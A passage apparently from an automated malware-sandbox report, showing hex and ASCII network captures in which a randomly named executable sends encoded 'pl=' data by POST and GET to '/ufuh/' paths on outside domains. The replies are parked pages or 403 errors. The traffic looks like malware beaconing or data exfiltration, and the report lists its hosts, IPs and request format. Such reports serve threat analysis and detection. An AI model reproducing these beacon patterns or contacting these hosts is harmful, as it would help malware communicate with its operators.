                                                                                            Data Ascii: arkingweb&utm_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loop
                                                                                            May 2, 2024 08:27:46.690222025 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            8192.168.2.2249172194.9.94.86802848C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 2, 2024 08:27:49.213351011 CEST2578OUTPOST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 3623
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.xn--matfrmn-jxa4m.se
                                                                                            Origin: http://www.xn--matfrmn-jxa4m.se
                                                                                            Referer: http://www.xn--matfrmn-jxa4m.se/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                            Data Raw: 70 6c 3d 45 41 4e 63 46 47 39 32 58 46 4e 61 37 43 38 31 63 6d 2b 32 69 6a 71 79 6d 78 4b 78 76 49 64 51 63 66 73 6e 68 48 54 49 4f 45 6a 77 69 32 55 37 49 58 4f 59 61 7a 42 6b 47 37 74 73 5a 62 48 62 58 4b 74 63 76 74 2b 59 67 4e 71 64 43 73 4e 79 7a 48 62 5a 69 5a 68 64 62 38 62 76 6a 64 64 63 44 56 41 43 68 71 4e 55 6d 62 33 59 4c 43 6b 69 6d 59 6a 39 43 76 6f 48 41 46 37 53 67 75 4d 45 62 44 55 68 59 66 6d 4f 79 56 6f 45 66 34 73 61 58 68 6a 64 43 6b 38 77 6d 56 78 52 4e 79 30 56 63 79 68 6d 7a 5a 30 66 4a 6b 59 6a 54 6b 4a 70 49 6b 33 5a 6b 58 2f 36 4b 6d 42 2f 53 58 6b 72 39 7a 68 39 2f 6e 71 73 42 76 5a 78 4f 2f 41 35 58 6e 55 69 75 31 45 61 4c 63 69 75 59 4f 50 43 55 43 73 54 71 4a 70 6e 51 44 68 57 71 73 63 41 38 63 2f 31 68 75 59 5a 63 73 6d 77 67 73 4f 6e 5a 2f 2b 63 5a 52 51 47 65 45 69 37 71 6b 79 48 30 4a 36 2b 75 44 70 51 45 57 77 72 73 77 67 4a 64 4c 53 6a 4e 4f 34 32 57 43 78 62 2f 44 6f 59 6a 4c 48 49 36 38 66 6e 56 77 31 61 72 71 7a 67 61 37 38 4d 57 4b 57 67 71 4b 68 42 2f 6d 63 [TRUNCATED]
                                                                                            Data Ascii: pl=EANcFG92XFNa7C81cm+2ijqymxKxvIdQcfsnhHTIOEjwi2U7IXOYazBkG7tsZbHbXKtcvt+YgNqdCsNyzHbZiZhdb8bvjddcDVAChqNUmb3YLCkimYj9CvoHAF7SguMEbDUhYfmOyVoEf4saXhjdCk8wmVxRNy0VcyhmzZ0fJkYjTkJpIk3ZkX/6KmB/SXkr9zh9/nqsBvZxO/A5XnUiu1EaLciuYOPCUCsTqJpnQDhWqscA8c/1huYZcsmwgsOnZ/+cZRQGeEi7qkyH0J6+uDpQEWwrswgJdLSjNO42WCxb/DoYjLHI68fnVw1arqzga78MWKWgqKhB/mcH3CMkgrmmdcj9XxEJho0iJ9AqstlAk++1kmInN6+rZBTZvj7OSi+PS9bxyp+gvTXKIpGkvm6udyL9dx5m6ssvUCC/hvIcUvfwuJ2P1liTSHyHPhc9pgZ1yDSOfErmQnYRpB7mBMipvQWdBhMmgN8Q5jXuDJpvva59AIabfMkhLGfDHAddKOaRn2Wbj7iuYNiMUJLrRqhXmApbPnjYZLbcYrzJzO5d070ZcggLaK+NgkdtDzENMiUnh+nhGGXuL24bkm2Ri1ZF7gj30bYl0xjJpEfdeW92Mz+fAB4DIcVpxWRsOz1qWVH7PF0YLXTapSunqsCNXy9apagjRmRa2nvCpjb9733D+4X7rbB9MlCDH64vQIAl+PBIumBXT4eg+yZXHaSsYirG3iS5LtcsIbSMGoYXOLoRCUwOpNsKMOGCxi7P4sJhO90c+bpBOeFmLBwi5/sru2AtiGO8LLlpjhhmBgvaCUgRX5chetm3phNVbaj8w9pMPcDklfqyt0vLsFKGubuh8cASq3JVoSOQ7G5CRRHnB5n4NBZ1aJCSkuOwDTlLElclj+wTIkLIzdSBZqqP7TpYmpLRYN8/HzgLCH+ilm9NybLKUQEcysmPBLgzHde1D44u6gvplR+rn9dK1L+T7ayBONZ74umC/dQpi3A5pG0ddih0TQpiI [TRUNCATED]
                                                                                            May 2, 2024 08:27:49.399626970 CEST1591OUTData Raw: 33 4d 36 54 59 4d 59 73 61 68 78 62 64 6b 65 58 71 72 4a 58 64 50 43 62 2b 79 41 75 54 58 77 70 48 54 47 2b 6d 57 4c 72 73 31 57 4e 69 73 2f 75 50 6e 2b 70 65 66 36 55 72 7a 78 73 4c 2f 50 2f 64 53 50 48 6f 57 52 57 49 42 39 4f 64 61 6f 4e 42 4a
                                                                                            Data Ascii: 3M6TYMYsahxbdkeXqrJXdPCb+yAuTXwpHTG+mWLrs1WNis/uPn+pef6UrzxsL/P/dSPHoWRWIB9OdaoNBJDDZwcdli5QKYrFm9VpSN7Y725/k4uSralC3XEzetlRfitUqPjdDXb//ttg9E4DcbquSCpsRGrwG2vIaB5frPVK+styaW5ZNHEijJ1KZ4oHMgWfZ2ecQEZQ8ufrDx2ab/t7vcLeI/U9SHJvaPEPwRWgUukv/ER6qNo
                                                                                            May 2, 2024 08:27:49.586007118 CEST1289INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Thu, 02 May 2024 06:27:49 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            X-Powered-By: PHP/8.1.24
                                                                                            Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                                                                            Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                                                            May 2, 2024 08:27:49.586066961 CEST1289INData Raw: 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 61 6e 64 20 28 72 65 73 6f 6c 75 74 69 6f 6e 3a 20 33 32 36 64 70 69 29 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 6c 6f 6f 70 69 61
                                                                                            Data Ascii: le-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet
                                                                                            May 2, 2024 08:27:49.586081982 CEST1289INData Raw: 20 74 6f 20 76 69 65 77 20 74 68 65 20 64 6f 6d 61 69 6e 20 68 6f 6c 64 65 72 27 73 20 70 75 62 6c 69 63 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 70 3e 0a 09 09 09 3c 70 3e 41 72 65 20 79 6f 75 20 74 68 65 20 6f 77 6e 65 72 20 6f 66 20 74 68
                                                                                            Data Ascii: to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_con
                                                                                            May 2, 2024 08:27:49.586095095 CEST1289INData Raw: 6c 20 63 6f 6e 74 72 6f 6c 20 6f 66 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 77 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 3c 2f 68 33 3e 0a 09 09 09 3c 70 3e 57 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62
                                                                                            Data Ascii: l control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingwe
                                                                                            May 2, 2024 08:27:49.586102009 CEST661INData Raw: 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 68 6f 73 74 69 6e 67 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 4f 75 72
                                                                                            Data Ascii: arkingweb&utm_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loop
                                                                                            May 2, 2024 08:27:49.586116076 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            9192.168.2.2249173194.9.94.86802848C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 2, 2024 08:27:51.914592028 CEST473OUTGET /ufuh/?pl=JCl8GzBEdF4l5nIyfkeq0ia6oie6u6lAQeoh+x3kN0jP8DE3DVbhST9RD9xIYa+bXtx9nrjGgO+XENgp6DrguLhYbN7qtNMSCWk+pZJhu575eHJRgqTZAIE4NheL&5h1t=6H6PKFvXjtI4u8k HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Connection: close
                                                                                            Host: www.xn--matfrmn-jxa4m.se
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                            May 2, 2024 08:27:52.101787090 CEST1289INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Thu, 02 May 2024 06:27:52 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            X-Powered-By: PHP/8.1.24
                                                                                            Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                                                                            Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                                                            May 2, 2024 08:27:52.101840019 CEST1289INData Raw: 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 61 6e 64 20 28 72 65 73 6f 6c 75 74 69 6f 6e 3a 20 33 32 36 64 70 69 29 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 6c 6f 6f 70 69 61
                                                                                            Data Ascii: le-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet
                                                                                            May 2, 2024 08:27:52.101897001 CEST1289INData Raw: 20 74 6f 20 76 69 65 77 20 74 68 65 20 64 6f 6d 61 69 6e 20 68 6f 6c 64 65 72 27 73 20 70 75 62 6c 69 63 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 70 3e 0a 09 09 09 3c 70 3e 41 72 65 20 79 6f 75 20 74 68 65 20 6f 77 6e 65 72 20 6f 66 20 74 68
                                                                                            Data Ascii: to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_con
                                                                                            May 2, 2024 08:27:52.102003098 CEST1289INData Raw: 6c 20 63 6f 6e 74 72 6f 6c 20 6f 66 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 77 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 3c 2f 68 33 3e 0a 09 09 09 3c 70 3e 57 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62
                                                                                            Data Ascii: l control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingwe
                                                                                            May 2, 2024 08:27:52.102054119 CEST661INData Raw: 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 68 6f 73 74 69 6e 67 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 4f 75 72
                                                                                            Data Ascii: arkingweb&utm_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loop
                                                                                            May 2, 2024 08:27:52.102118969 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            10192.168.2.224917491.195.240.19802848C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 2, 2024 08:27:57.406066895 CEST2578OUTPOST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 2159
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.primeplay88.org
                                                                                            Origin: http://www.primeplay88.org
                                                                                            Referer: http://www.primeplay88.org/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                            Data Raw: 70 6c 3d 6a 44 58 71 4f 62 6b 69 45 6a 42 59 51 32 6a 70 48 61 45 46 55 52 6f 69 39 38 37 5a 78 7a 6b 4b 6d 54 4b 46 59 53 55 45 50 75 39 67 4f 62 53 4d 73 31 33 4f 49 6d 71 64 48 50 70 76 30 6c 5a 70 41 43 69 43 58 51 41 67 47 63 50 57 47 61 43 32 4e 50 6b 77 71 31 31 54 44 33 62 31 31 52 45 58 30 2b 35 78 4f 76 54 47 54 55 72 76 51 45 4e 4c 43 64 48 47 2f 32 59 48 36 72 35 6a 4d 4b 76 45 69 4e 54 42 30 56 68 7a 44 33 66 49 6e 78 54 39 6b 35 71 2b 41 51 45 46 65 51 79 4a 61 36 66 6c 49 53 69 30 63 55 41 61 54 4f 61 70 31 4c 52 6c 72 53 45 79 35 41 52 41 37 2f 56 77 76 46 43 77 65 70 54 34 75 6b 56 45 52 44 65 56 33 44 2f 37 48 62 4e 57 50 57 44 41 4e 6f 75 52 31 74 71 51 43 75 31 77 61 6b 43 37 48 79 6d 53 38 2b 71 77 30 77 32 76 2b 72 31 48 71 52 47 79 4b 7a 59 35 73 65 79 42 78 38 66 48 4f 43 61 2f 4a 76 72 68 6f 59 4c 78 41 64 64 6a 6c 6a 73 42 38 57 4d 4f 77 73 69 38 77 43 39 51 7a 32 77 51 41 56 70 63 32 2f 48 2b 41 78 6b 64 78 4b 7a 6e 74 4c 52 35 42 6a 6d 69 48 32 39 75 79 53 63 41 36 74 41 [TRUNCATED]
                                                                                            Data Ascii: pl=jDXqObkiEjBYQ2jpHaEFURoi987ZxzkKmTKFYSUEPu9gObSMs13OImqdHPpv0lZpACiCXQAgGcPWGaC2NPkwq11TD3b11REX0+5xOvTGTUrvQENLCdHG/2YH6r5jMKvEiNTB0VhzD3fInxT9k5q+AQEFeQyJa6flISi0cUAaTOap1LRlrSEy5ARA7/VwvFCwepT4ukVERDeV3D/7HbNWPWDANouR1tqQCu1wakC7HymS8+qw0w2v+r1HqRGyKzY5seyBx8fHOCa/JvrhoYLxAddjljsB8WMOwsi8wC9Qz2wQAVpc2/H+AxkdxKzntLR5BjmiH29uyScA6tAoZ7F0PJ/nShC3U+4nlo2bdNGuBMZd0tZx0mOvZo8SJbfhBV8etSfKU/IdDh3fMCtwXW0a0HuEh8vB6blJo+GfWYbOvcLa2mhlHMKYi8OPnFam+DuGZEMM335WKXk4tAxf6iKeymUjRcIM0EKQYb/OZI1H1pHgbsehVlMLqDmUFCXnvR4bY9/CyisiBdc7SVgrDDIoZNbDfbEVmRysXEUORcsirHhJUjAp9NPHQES9TkX59rTLhycpBog1ptzRJQIBoO2wanDT1EPQ1SSOGPocnUIvaqZe5SB/mvZWfqpyY4GaAGQP9XJ+lSqJz3LBYm3LOd0pgDZrKUt9gKamC5zgVvZ3/TLKrnIMOFY5SUVkGXbo3qhg4DHkQjybTZzDUSh+3jmum2AiVmULcab/3SKRDkW2iVjPc1TBL3VUL0U2UhGYJbnNXkX8fqq0yx8cmEYdbhmv/FnTqs0cWqiVzIegvUrj95LweIDfMvq9ylqyIcv3rZBZBTP6oQfAO35zF/E1nVLOY8lEuhxk8rpZ8h79SF35oEHmI7uF/C790E7sej617kKTDqaJVzjAZ2b4k/uPlE+dwotYtpk//rSE7LK8Wbh2YBjh8mcEoZmF4RA9ro3VvA4KHF3cJFshVxGjRrTj2Y2Nh91N3ncFJ77am4Kqe6aqXtcJ4gvhM [TRUNCATED]
                                                                                            May 2, 2024 08:27:57.581255913 CEST112OUTData Raw: 73 43 5a 71 77 45 65 4c 37 63 65 6c 50 42 58 6d 64 6a 58 5a 54 6e 6a 75 70 38 34 73 7a 64 59 49 35 67 51 76 6e 37 6d 39 52 62 57 6a 53 4d 62 74 41 69 37 41 66 76 4c 5a 30 72 67 31 50 68 41 57 45 42 4a 77 4c 6e 74 41 66 64 54 39 65 43 66 64 33 35
                                                                                            Data Ascii: sCZqwEeL7celPBXmdjXZTnjup84szdYI5gQvn7m9RbWjSMbtAi7AfvLZ0rg1PhAWEBJwLntAfdT9eCfd35dDElASkZdFpUkVGl9Hi+8xj5w13606
                                                                                            May 2, 2024 08:27:57.581259966 CEST208INHTTP/1.1 403 Forbidden
                                                                                            content-length: 93
                                                                                            cache-control: no-cache
                                                                                            content-type: text/html
                                                                                            connection: close
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                            Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            11192.168.2.224917591.195.240.19802848C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 2, 2024 08:28:00.253900051 CEST729OUTPOST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 199
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.primeplay88.org
                                                                                            Origin: http://www.primeplay88.org
                                                                                            Referer: http://www.primeplay88.org/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                            Data Raw: 70 6c 3d 6a 44 58 71 4f 62 6b 69 45 6a 42 59 51 78 2f 70 47 4c 45 46 53 78 6f 69 36 38 37 5a 2f 54 6b 45 6d 54 57 6e 59 57 4d 55 4f 66 31 67 50 4b 69 4d 74 48 76 4f 62 57 71 65 49 76 70 6a 72 31 59 74 41 43 69 34 58 51 38 67 47 63 62 57 47 35 71 32 50 4c 77 78 6d 6c 31 64 61 48 62 77 31 52 59 65 30 2b 31 68 4f 76 37 47 54 53 6a 76 52 45 64 4c 48 37 7a 47 74 32 59 42 38 72 35 34 4d 4c 54 64 69 4e 44 4a 30 52 68 7a 44 6d 7a 49 2b 42 7a 39 6a 71 43 2b 4b 77 45 45 55 77 7a 4e 65 35 47 6f 43 45 2b 30 51 47 55 46 4e 63 75 76 32 70 78 58 7a 7a 6f 34 7a 77 70 7a 6b 34 34 55 70 46 7a 39 4e 41 3d 3d
                                                                                            Data Ascii: pl=jDXqObkiEjBYQx/pGLEFSxoi687Z/TkEmTWnYWMUOf1gPKiMtHvObWqeIvpjr1YtACi4XQ8gGcbWG5q2PLwxml1daHbw1RYe0+1hOv7GTSjvREdLH7zGt2YB8r54MLTdiNDJ0RhzDmzI+Bz9jqC+KwEEUwzNe5GoCE+0QGUFNcuv2pxXzzo4zwpzk44UpFz9NA==
                                                                                            May 2, 2024 08:28:00.429229975 CEST208INHTTP/1.1 403 Forbidden
                                                                                            content-length: 93
                                                                                            cache-control: no-cache
                                                                                            content-type: text/html
                                                                                            connection: close
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                            Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            12192.168.2.224917691.195.240.19802848C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 2, 2024 08:28:02.949915886 CEST2578OUTPOST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 3623
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.primeplay88.org
                                                                                            Origin: http://www.primeplay88.org
                                                                                            Referer: http://www.primeplay88.org/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
